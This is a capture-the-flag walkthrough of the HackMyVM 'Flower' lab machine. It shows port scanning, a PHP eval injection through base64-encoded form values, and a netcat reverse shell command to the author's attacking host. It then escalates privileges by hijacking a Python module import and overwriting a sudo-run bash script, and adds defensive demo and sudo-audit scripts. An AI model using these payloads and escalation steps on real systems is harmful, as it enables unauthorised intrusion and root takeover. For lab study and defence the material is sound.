
HMV-Flower

HMV-Flower machine walkthrough

Port scanning

┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.240.115
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-02 19:12 CST
Nmap scan report for 192.168.240.115
Host is up (0.0018s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 1A:69:75:79:70:92 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 1.79 ms 192.168.240.115

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.02 seconds

Only port 80 (HTTP) is open in the default top-1000 scan; a full `nmap -p- 192.168.240.115` sweep is the usual check that nothing else is listening on a high port.

Web enumeration


The web page has nothing but a submit button, and there is no file upload.
Directory brute-forcing turned up nothing useful either.
Look at the page source:

<!DOCTYPE html>
<html>
<head>
<style>
html {
background: url(flower.jpg) no-repeat center center fixed;
background-size: cover;
}
</style>
</head>
<body>
<h1 style="background-color:pink;">Count Petals</h1>
<label for="flowers" style="background-color:pink;">Choose a flower to count petals:</label>
<select name="petals" form="flosub">
<option name="Lily" value="MSsy">Lily</option>
<option name="Buttercup" value="Misz">Buttercup</option>
<option name="Delphiniums" value="Mys1">Delphiniums</option>
<option name="Cineraria" value="NSs4">Cineraria</option>
<option name="Chicory" value="OCsxMw==">Chicory</option>
<option name="Chrysanthemum" value="MTMrMjE=">Chrysanthemum</option>
<option name="Michaelmas daisies" value="MjErMzQ=">Michaelmas daisies</option>
</select>
<form action="/" method="post" id="flosub">
<input type="submit" value="Submit">
</form>
<h2>


</h2>
</body>
</html>

The option values are base64-encoded (not encrypted) arithmetic expressions, and the petals parameter is sent in a POST request. To turn "1+2" into a petal count the server has to decode the value and evaluate it, so the guess is that the decoded string is handed to something like PHP's eval(), which would be a code execution vulnerability. Decode one value to confirm the format:

┌──(root㉿kakeru)-[~/tmp]
└─# echo "MSsy" | base64 --decode
1+2

So we intercept the request in Burp Suite and replace the petals value with base64-encoded PHP. Encode the command first (plain `echo` appends a newline, which is why the output ends in "Qo="; it is harmless here, and `echo -n` avoids it):

┌──(root㉿kakeru)-[~/tmp]
└─# echo "system('pwd')" | base64
c3lzdGVtKCdwd2QnKQo=


Use the same channel for a reverse shell; the web server runs as www-data. Start a listener on the attacking host (192.168.240.83) first, then send the following command, base64-encoded, in petals (`nc -e` needs netcat-traditional on the target; if it is missing, a bash `/dev/tcp` one-liner does the same job):
system('nc -e /bin/bash 192.168.240.83 1234')

┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1234
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Privilege escalation

www-data@flower:/home$ sudo -l
Matching Defaults entries for www-data on flower:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on flower:
(rose) NOPASSWD: /usr/bin/python3 /home/rose/diary/diary.py

www-data may run one script as rose through sudo, without a password.
Let's look at the script:

www-data@flower:/home$ cat /home/rose/diary/diary.py
import pickle

diary = {"November28":"i found a blue viola","December1":"i lost my blue viola"}
p = open('diary.pickle','wb')
pickle.dump(diary,p)

From a writeup I learned the trick: the directory containing diary.py, /home/rose/diary, is writable by www-data (confirm with `ls -ld /home/rose/diary`). Python puts the script's own directory at the front of sys.path, so a file named pickle.py placed there shadows the standard-library pickle module and gets executed by the `import pickle` on the first line of diary.py, under rose's privileges.

www-data@flower:/home/rose/diary$ echo "import os;os.system('/bin/bash')" > pickle.py
www-data@flower:/home/rose/diary$ sudo -u rose /usr/bin/python3 /home/rose/diary/diary.py
rose@flower:~/diary$

Because the first statement of diary.py is `import pickle`, our pickle.py is loaded instead of the real module and runs as rose, giving us a shell as rose (diary.pickle is never written at all).
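The hijack reproduced safely on any Linux box, as an added example (not the box's diary.py or the payload used above): a stand-in diary.py and a rogue pickle.py that only sets a marker are written into one directory, the script is run from a different working directory, and the function reports which pickle was imported. Running the same script with `python3 -I` (isolated mode, which leaves the script directory off sys.path) shows the fix that would have blocked this sudo rule. Names and paths are my own.

```python
import os
import subprocess
import sys
import tempfile
import textwrap

# Stand-in for diary.py: its first statement is `import pickle`, as on the box.
# It reports which pickle it got instead of dumping a dict.
TARGET_SCRIPT = textwrap.dedent("""\
    import pickle
    print(getattr(pickle, "HIJACK_MARKER", "genuine"))
""")

# Stand-in for the attacker's pickle.py. On the box it was
# `import os;os.system('/bin/bash')`; here it only leaves a marker.
ROGUE_MODULE = 'HIJACK_MARKER = "hijacked"\n'


def run_target(isolated: bool) -> str:
    """Drop diary.py and a rogue pickle.py in one writable directory, run diary.py
    from a *different* working directory, and return which module was imported."""
    with tempfile.TemporaryDirectory() as script_dir:
        script = os.path.join(script_dir, "diary.py")
        with open(script, "w") as fh:
            fh.write(TARGET_SCRIPT)
        with open(os.path.join(script_dir, "pickle.py"), "w") as fh:
            fh.write(ROGUE_MODULE)

        cmd = [sys.executable]
        if isolated:
            # -I (isolated mode) does not put the script's directory on sys.path,
            # so the stdlib pickle wins. Python 3.11+ also has -P for just that.
            cmd.append("-I")
        cmd.append(script)
        result = subprocess.run(
            cmd, capture_output=True, text=True, check=True,
            cwd=os.path.dirname(script_dir),  # it is the script dir, not cwd, that matters
        )
        return result.stdout.strip()


if __name__ == "__main__":
    print("python3 diary.py    ->", run_target(isolated=False))
    print("python3 -I diary.py ->", run_target(isolated=True))
```

The defensive lesson is the same either way: a sudo rule that runs an interpreter on a script is only as strong as the write permissions on that script's directory, and `python3 -I` (or `-P`) removes the implicit search path that makes the shadowing possible.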
rose turns out to have a sudo rule of her own:

rose@flower:~/diary$ sudo -l
Matching Defaults entries for rose on flower:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User rose may run the following commands on flower:
(root) NOPASSWD: /bin/bash /home/rose/.plantbook

Let's look at its contents:

rose@flower:~$ cat .plantbook
#!/bin/bash
echo Hello, write the name of the flower that u found
read flower
echo Nice, $flower submitted on : $(date)

The script lives in rose's home directory and is writable by rose, so there is no need to play with the `read` prompt: overwrite the whole file with a single line that starts bash, which sudo will then run as root.

rose@flower:~$ echo "/bin/bash" > .plantbook

Then run it through the sudo rule to get a root shell:

rose@flower:/$ cat /home/rose/.plantbook
/bin/bash
rose@flower:/$ sudo /bin/bash /home/rose/.plantbook
root@flower:/# 
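Both sudo steps (the writable script directory behind diary.py and the writable .plantbook) are the same class of mistake, so here is an added audit helper that is not from the post: it parses the rule lines of `sudo -l` output, and for every absolute path in a rule checks from raw mode bits whether a given uid/group set could write the file, or, for a .py script, its directory. `demo()` rebuilds the box's layout in a temp dir (my own constructed sample, with the rule lines rewritten to those paths) and audits it once as the file owner and once as an unrelated user, which mirrors rose and www-data. It ignores ACLs and only looks at absolute-path commands.

```python
import os
import re
import stat
import tempfile

# Matches the rule lines of `sudo -l` output, e.g.
#     (root) NOPASSWD: /bin/bash /home/rose/.plantbook
# Only absolute-path commands are considered; "(ALL : ALL) ALL" is ignored.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?:NOPASSWD:\s*)?(?P<cmd>/\S.*)$")

FILE_WRITABLE = "file writable"
DIR_WRITABLE = "script directory writable"


def parse_rules(sudo_l_output: str):
    """Return (run-as user, argv) for each rule line."""
    rules = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if m:
            rules.append((m.group("runas").strip(), m.group("cmd").split()))
    return rules


def writable_by(path: str, uid: int, gids: set) -> bool:
    """Mode-bit check for an arbitrary (uid, groups) pair. Unlike os.access()
    it does not special-case root, and it ignores ACLs (a known limitation)."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return False
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)


def weak_points(argv, uid, gids):
    """Files the given user could tamper with before the sudo rule runs them."""
    hits = []
    for arg in argv:
        if not arg.startswith("/"):
            continue
        if writable_by(arg, uid, gids):
            hits.append((arg, FILE_WRITABLE))   # .plantbook case: overwrite it
        if arg.endswith(".py") and writable_by(os.path.dirname(arg), uid, gids):
            hits.append((arg, DIR_WRITABLE))    # diary.py case: shadow an import
    return hits


def audit(sudo_l_output, uid, gids):
    return [(runas, " ".join(argv), weak_points(argv, uid, gids))
            for runas, argv in parse_rules(sudo_l_output)]


def summarize(findings):
    return sorted((os.path.basename(path), reason)
                  for _, _, hits in findings for path, reason in hits)


def demo():
    """Rebuild the box's layout in a temp dir and audit it from two viewpoints:
    the file owner (rose) and an unrelated user with no groups (www-data)."""
    with tempfile.TemporaryDirectory() as home:
        diary_dir = os.path.join(home, "diary")
        os.mkdir(diary_dir)
        diary = os.path.join(diary_dir, "diary.py")
        plantbook = os.path.join(home, ".plantbook")
        for path in (diary, plantbook):
            with open(path, "w") as fh:
                fh.write("# placeholder\n")
            os.chmod(path, 0o644)
        os.chmod(diary_dir, 0o777)  # the misconfiguration: anyone can drop pickle.py here
        sample = (f"    (rose) NOPASSWD: /usr/bin/python3 {diary}\n"
                  f"    (root) NOPASSWD: /bin/bash {plantbook}\n")
        me = os.getuid()
        owner = audit(sample, me, set(os.getgroups()) | {os.getgid()})
        stranger = audit(sample, me + 1, set())
        return summarize(owner), summarize(stranger)


if __name__ == "__main__":
    owner_view, stranger_view = demo()
    print("as owner   :", owner_view)
    print("as stranger:", stranger_view)
```

On the real box the equivalent manual checks are `sudo -l` followed by `ls -ld` on every path in the rule and on its parent directory; the script just makes the second step systematic.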

Summary. The key points of this box: 1. find the code execution vulnerability from the web page source and turn it into a reverse shell; 2. Python library hijacking (new to me): when a sudo rule runs a Python script from a directory you can write to, plant a module that shadows one the script imports; 3. for shell scripts run through sudo, check whether they are writable; if they are, replace the contents with /bin/bash.